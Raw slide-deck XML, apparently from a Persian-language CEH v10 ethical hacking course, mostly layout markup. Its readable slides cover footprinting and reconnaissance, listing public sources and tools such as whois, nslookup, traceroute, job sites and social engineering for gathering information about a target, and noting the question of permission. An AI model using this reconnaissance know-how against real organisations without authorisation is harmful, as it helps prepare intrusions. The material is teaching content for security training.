              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-292100" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="80" name="Shape 80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-3"/>
            <a:ext cx="9144007" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436825" y="849050"/>
            <a:ext cx="4065900" cy="1955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424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436825" y="2974150"/>
            <a:ext cx="4065900" cy="5505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424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;8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5">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="85" name="Shape 85"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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a:off x="4072700" y="313275"/>
            <a:ext cx="4757400" cy="45228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a:off x="306750" y="313500"/>
            <a:ext cx="3452400" cy="4522800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574350" y="576900"/>
            <a:ext cx="2917200" cy="3996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l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276850" y="576900"/>
            <a:ext cx="4349100" cy="3860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91" name="Google Shape;9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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/commen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9.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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436825" y="849050"/>
            <a:ext cx="4065900" cy="1955400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>دوره CEH نسخه ۱۰</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436825" y="2974150"/>
            <a:ext cx="4065900" cy="5505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جادی برای مکتبخونه</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="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Footprinting and Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701200" y="200570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Passive vs Active</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Their site itself</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Internet Archive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netcraft</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Google (General, specific search the vulnerability)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Google Maps</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AnyWho</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Monster, Jobinja, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Forum, blogs, … even </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Social Networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EMail (attack vector &amp; raw info like headers)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>whois</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>raceroute / tracert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Social Eng.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p26"/>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---&gt; اجازه دارید؟</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>قدم اول هک جمع آوری اطلاعات است. اطلاعات باعث می شه دقیق‌تر حمله کنید، هم به جای دقیق تر و هم با آگاهی بیشتر.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Footprinting vs Scanning vs Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>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2" name="Shape 712"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="Google Shape;713;p11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Basic Encryption</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
